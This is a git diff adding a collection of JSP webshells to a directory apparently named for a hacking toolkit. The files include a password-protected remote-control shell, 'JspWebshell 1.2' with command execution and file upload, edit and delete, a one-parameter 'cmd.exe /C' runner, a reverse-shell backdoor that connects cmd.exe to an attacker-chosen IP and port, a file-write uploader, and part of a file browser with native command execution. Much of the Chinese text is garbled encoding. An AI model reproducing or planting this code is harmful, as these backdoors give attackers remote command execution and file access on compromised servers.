diff --git a/jsp/hackk8/JSP_66/Customize.jsp b/jsp/hackk8/JSP_66/Customize.jsp new file mode 100644 index 0000000..d3acce2 --- /dev/null +++ b/jsp/hackk8/JSP_66/Customize.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="k8"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/JSP_66/JSP无组件实现WEB上传.rar b/jsp/hackk8/JSP_66/JSP无组件实现WEB上传.rar new file mode 100644 index 0000000..f81f6a1 Binary files /dev/null and b/jsp/hackk8/JSP_66/JSP无组件实现WEB上传.rar differ diff --git a/jsp/hackk8/JSP_66/Java Shell.jsp b/jsp/hackk8/JSP_66/Java Shell.jsp new file mode 100644 index 0000000..f15e864 --- /dev/null +++ b/jsp/hackk8/JSP_66/Java Shell.jsp @@ -0,0 +1,125 @@ +package enigma.shells.jython; + +import java.io.*; +import java.awt.*; +import javax.swing.*; + +import enigma.console.*; +import enigma.console.java2d.*; + +import org.python.core.*; +import org.python.util.*; + +public class JythonShell extends JPanel implements Runnable { + public static int DEFAULT_ROWS = 20; + public static int DEFAULT_COLUMNS = 80; + public static int DEFAULT_SCROLLBACK = 100; + + public PrintStream out; + + public Console console; + public Java2DTextWindow text; + public JScrollPane scrollPane; + public PythonInterpreter interp; + + private Color colorBackground = new Color(0, 0, 0); + private Color colorForeground = new Color(187, 187, 187); + private Color colorError = new Color(187, 0, 0); + private Color colorCursor = new Color(187, 187, 0); + + public JythonShell() { + this(null, Py.getSystemState()); + } + + public JythonShell(PyObject dict) { + this(dict, Py.getSystemState()); + } + + public JythonShell(int columns, int rows, int scrollback) { + this(null, Py.getSystemState(), columns, rows, scrollback); + } + + public JythonShell(PyObject dict, PySystemState systemState) { + this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK); + } + + public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) { + super(new BorderLayout()); + + text = new Java2DTextWindow(columns, rows, scrollback); + text.setBackground(colorBackground); + + scrollPane = new JScrollPane(); + scrollPane.setViewportView(text); + + add(scrollPane, BorderLayout.CENTER); + + console = new DefaultConsoleImpl(text); + out = console.getOutputStream(); + + interp = new PythonInterpreter(dict, systemState); + interp.setOut(out); + interp.setErr(out); + } + + public void run() { + int pos = 0; + int tbs = 4; + + String line = ""; + String command = ""; + + for (;;) { + String space = ""; + for (int i = 0; i < pos * tbs; i++) { + space += " "; + } + + try { + console.setTextAttributes(new TextAttributes(colorCursor)); + + if (pos > 0) { + out.print(space + "... "); + } else { + out.print(">> "); + } + + console.setTextAttributes(new TextAttributes(colorForeground)); + + line = console.readLine().trim(); + if (line.length() == 0 && pos > 0) { + pos--; + } else if (line.endsWith(":")) { + command += space + line + "\n"; + pos++; + } else { + command += space + line + "\n"; + } + + if (pos == 0) { + interp.exec(command); + command = ""; + } + } catch (Exception e) { + console.setTextAttributes(new TextAttributes(colorError)); + + e.printStackTrace(); + command = ""; + } + } + } + + public static void main(String[] argv) { + PySystemState.initialize(System.getProperties(), null, argv); + + JFrame frame = new JFrame("Jython Console"); + JythonShell console = new JythonShell(); + + frame.add(console, BorderLayout.CENTER); + frame.pack(); + frame.setVisible(true); + frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + console.run(); + } +} \ No newline at end of file diff --git a/jsp/hackk8/JSP_66/JspWebshell 1.2.jsp b/jsp/hackk8/JSP_66/JspWebshell 1.2.jsp new file mode 100644 index 0000000..4ce0fcf --- /dev/null +++ b/jsp/hackk8/JSP_66/JspWebshell 1.2.jsp @@ -0,0 +1,788 @@ +<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %> +<% +/** + *

Title:JspWebshell

+ * + *

Description: jspվ

+ * + *

Copyright:[B.C.T] Copyright (c) 2006

+ * + *

Company: zero.cnbct.org

+ * PS:СܴȤдϵQQ:48124012 + * @version 1.2 + */ + String path=""; + String selfName=""; + boolean copyfinish=false; +%> +<% selfName=request.getRequestURI(); + // String editfile=""; + String editfile=request.getParameter("editfile"); + if (editfile!=null) + {editfile=new String(editfile.getBytes("ISO8859_1")); + } + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); +%> +<%! + String _password ="111";// + public String readAllFile(String filePathName) throws IOException + { + FileReader fr = new FileReader(filePathName); + int count = fr.read(); + String res=""; + while(count != -1) + { + //System.out.print((char)count); + res=res+(char)count; + count = fr.read(); + if(count == 13) + { + fr.skip(1); + } + } + fr.close(); + return res; + } +public void writeFile(String filePathName,String args) throws IOException +{ +FileWriter fw = new FileWriter(filePathName); +PrintWriter out=new PrintWriter(fw); +out.write(args); +out.println(); +out.flush(); +fw.close(); +out.close(); +} +public boolean createFile(String filePathName) throws IOException +{ +boolean result = false; +File file = new File(filePathName); +if(file.exists()) +{ +System.out.println("ļѾڣ"); +} +else +{ +file.createNewFile(); +result = true; +System.out.println("ļѾ"); +} +return result; +} +public boolean createFolder(String fileFolderName) +{ +boolean result = false; +try +{ +File file = new File(fileFolderName); +if(file.exists()) +{ +//file.delete(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +else +{ +file.mkdir(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} + +public boolean DeleteFolder(String filefolderName) +{ +boolean result = false; +try +{ +File file = new File(filefolderName); +if(file.exists()) +{ +file.delete(); +System.out.println("Ŀ¼ɾ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "\"" + cmd + "\""; + } finally { + return retStr; + } + } + public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} +class EnvServlet +{ + public long timeUse=0; + public Hashtable htParam=new Hashtable(); + private Hashtable htShowMsg=new Hashtable(); + public void setHashtable() + { + Properties me=System.getProperties(); + Enumeration em=me.propertyNames(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=me.getProperty(strKey); + htParam.put(strKey,strValue); + } + } + public void getHashtable(String strQuery) + { + Enumeration em=htParam.keys(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=new String(); + if(strKey.indexOf(strQuery,0)>=0) + { + strValue=(String)htParam.get(strKey); + htShowMsg.put(strKey,strValue); + } + } + } + public String queryHashtable(String strKey) + { + strKey=(String)htParam.get(strKey); + return strKey; + } +/* public long test_int() + { + long timeStart = System.currentTimeMillis(); + int i=0; + while(i<3000000)i++; + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + } + public long test_sqrt() + { + long timeStart = System.currentTimeMillis(); + int i=0; + double db=(double)new Random().nextInt(1000); + while(i<200000){db=Math.sqrt(db);i++;} + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + }*/ +} +%> +<% + EnvServlet env=new EnvServlet(); + env.setHashtable(); + //String action=new String(" "); + //String act=new String("action"); + //if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act); +%> + + + + +JspWebShell By + + + + +<% +//session.setMaxInactiveInterval(_sessionOutTime * 60); +String password=request.getParameter("password"); +if (password == null && session.getAttribute("password") == null) { + +%> + +
+ + + + +
+ + + + + + + + + +
 8JspWebShell + version 1.2¼ :::...Power By +
+ + +
+
+<% + + } else { + + if (session.getAttribute("password") == null) { + + if (validate(password) == false) { + out.println("
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } +%> + <% + File tmpFile = null; + String delfile=""; + String delfile1=""; + String editpath=""; + delfile1=request.getParameter("delfile"); + editpath=request.getParameter("filepath"); + if (delfile1!=null) + {delfile=new String(delfile1.getBytes("ISO8859_1")); + } + if ( delfile1!= null) { + // out.print(delfile); + tmpFile = new File(delfile); + if (! tmpFile.delete()) { + out.print( "ɾʧ
    \n"); + } + } +%> + <%String editfilecontent=null; + String editfilecontent1=request.getParameter("content"); + // out.println(editfilecontent1); + //String save=request.getParameter("save"); + if (editfilecontent1!=null) + {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));} + // out.print(editfile); + //out.print(editfilecontent); + if (editfile!=null&editfilecontent!=null) + {try {writeFile(editfile,editfilecontent);} + catch (Exception e) {out.print("дʧ");} + out.print("дɹ"); + } + %> +<%request.setCharacterEncoding("GBK");%> +<%//String editfile=request.getParameter("editfile"); +//out.print(editfile); +if (request.getParameter("jsptz")!=null) +{%> +
    +
    + + + + + + + +
    ز +
    +
    + + + + + + + +
    JAVAز +
    +
    +
    +
    + +<%} +else{ +if (editfile!=null)//if edit +{ +%> +
    + + + + +
    +

    ַ + +

    +

    + + +

    +
    +

     

    +<%} +else{%> + + + + + + + + + + + + <%=path1%>" ENCTYPE="multipart/form-data"> + + + + + + <% String fileexe=""; + String dir=""; + String deldir=""; + String scrfile=""; + String dstfile=""; + fileexe=request.getParameter("fileexe"); + dir=request.getParameter("dir"); + deldir=request.getParameter("deldir"); + scrfile=request.getParameter("scrfile"); + dstfile=request.getParameter("dstfile"); + if (fileexe!=null) + { + //out.print(path+fileexe); + createFile(path+fileexe); + } + if (dir!=null) + { + //out.print(path+dir); + createFolder(path+dir); + } + if (deldir!=null) + { + //out.print(deldir); + DeleteFolder(deldir); + } + if (scrfile!=null&dstfile!=null) + { + //out.print(scrfile); + //out.print(dstfile); + copyfinish=fileCopy(scrfile, dstfile) ; + } + %> + + + + + + <%//ϴ + String tempfilename=""; + String up=request.getParameter("up"); + // String tempfilepath=request.getParameter("filepath"); + // out.print(tempfilepath); + if(up!=null) + { + tempfilename=(String)session.getId(); + //String tempfilename=request.getParameter("file"); + File f1=new File(tempfilepath,tempfilename); + int n; + try + { + InputStream in=request.getInputStream(); + BufferedInputStream my_in=new BufferedInputStream(in); + FileOutputStream fout=new FileOutputStream(f1); + BufferedOutputStream my_out=new BufferedOutputStream(fout); + byte[] b=new byte[10000]; + while((n=my_in.read(b))!=-1) + { + my_out.write(b,0,n); + } + my_out.flush(); + my_out.close(); + fout.close(); + my_in.close(); + in.close(); + // out.print("ļɹ!
    "); + } + catch(IOException e) + { + out.print("ļʧ!"); + } + + try + { + RandomAccessFile random1=new RandomAccessFile(f1,"r"); + random1.readLine(); + String filename=random1.readLine(); + byte[] b=filename.getBytes("ISO-8859-1"); + filename=new String(b); + int pointer=filename.lastIndexOf('\\'); + filename=filename.substring(pointer+1,filename.length()-1); + File f2=new File(tempfilepath,filename); + RandomAccessFile random2=new RandomAccessFile(f2,"rw"); + random1.seek(0); + for(int i=1; i<=4; i++) + { + String tempstr=random1.readLine(); + } + long startPoint=random1.getFilePointer(); + random1.seek(random1.length()); + long mark=random1.getFilePointer(); + int j=0; + long endPoint=0; + while((mark>=0)&&(j<=5)) + { + mark--; + random1.seek(mark); + n=random1.readByte(); + if(n=='\n') + + { + j++; + endPoint=random1.getFilePointer(); + } + } + long length=endPoint-startPoint+1; + int order=(int)(length/10000); + int left=(int)(length%10000); + byte[] c=new byte[10000]; + random1.seek(startPoint); + for(int i=0; i + + + + +
    JspWebShell + version 1.0(վĿ¼:<%=config.getServletContext().getRealPath("/")%>)
    + <% + File[] fs = File.listRoots(); + for (int i = 0; i < fs.length; i++){ + %> + ش(<%=fs[i].getPath()%>) + + <%}%> +
    +
    + + +
    +

    + <% + String cmd = ""; + InputStream ins = null; + String result = ""; + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command");result = exeCmd(cmd);%> + <%=result == "" ? " " : result%> + <%}%> +

    + JSP̽
    + ļ + + +
    + ļ + + +
    + ļ + Ƶ + + +
    <%if(copyfinish==true) out.print("Ƴɹ");%>
    + <% try { + //path=request.getParameter("path"); + //if(path==null) + //path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%>     ɾ
    + <% } + + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +       		+ <% try { + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%> + <%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">༭ +   ɾ
    + <% } + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +
    +

    Power By [B.C.T] QQ:48124012

    +

     

    +<%}//if edit +} +} +%> + + \ No newline at end of file diff --git a/jsp/hackk8/JSP_66/cmdjsp.jsp b/jsp/hackk8/JSP_66/cmdjsp.jsp new file mode 100644 index 0000000..2bd63ba --- /dev/null +++ b/jsp/hackk8/JSP_66/cmdjsp.jsp @@ -0,0 +1,31 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
+
    + diff --git a/jsp/hackk8/JSP_66/jsp-reverse.jsp b/jsp/hackk8/JSP_66/jsp-reverse.jsp new file mode 100644 index 0000000..6ce64c9 --- /dev/null +++ b/jsp/hackk8/JSP_66/jsp-reverse.jsp @@ -0,0 +1,90 @@ +// backdoor.jsp + + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +

    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + diff --git a/jsp/hackk8/JSP_66/minupload.jsp b/jsp/hackk8/JSP_66/minupload.jsp new file mode 100644 index 0000000..3994c00 --- /dev/null +++ b/jsp/hackk8/JSP_66/minupload.jsp @@ -0,0 +1,48 @@ + + <%@page contentType="text/html;charset=utf-8"%> + <%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { //这小马有问题 上传jsp就出错 + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("上传成功!"); + } catch (FileNotFoundException ex2) { + out.println("上传失败!"); + } catch (IOException ex) { + out.println("上传失败!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("上传失败!"); + } + } + } + %> +
    + 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> +
    +
    + 上传文件路径:"> +
    +
    + 上传文件内容: +
    +
    + +
    + + \ No newline at end of file diff --git a/jsp/hackk8/JSP_66/other/download.jsp b/jsp/hackk8/JSP_66/other/download.jsp new file mode 100644 index 0000000..85c73d1 --- /dev/null +++ b/jsp/hackk8/JSP_66/other/download.jsp @@ -0,0 +1,1913 @@ +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + 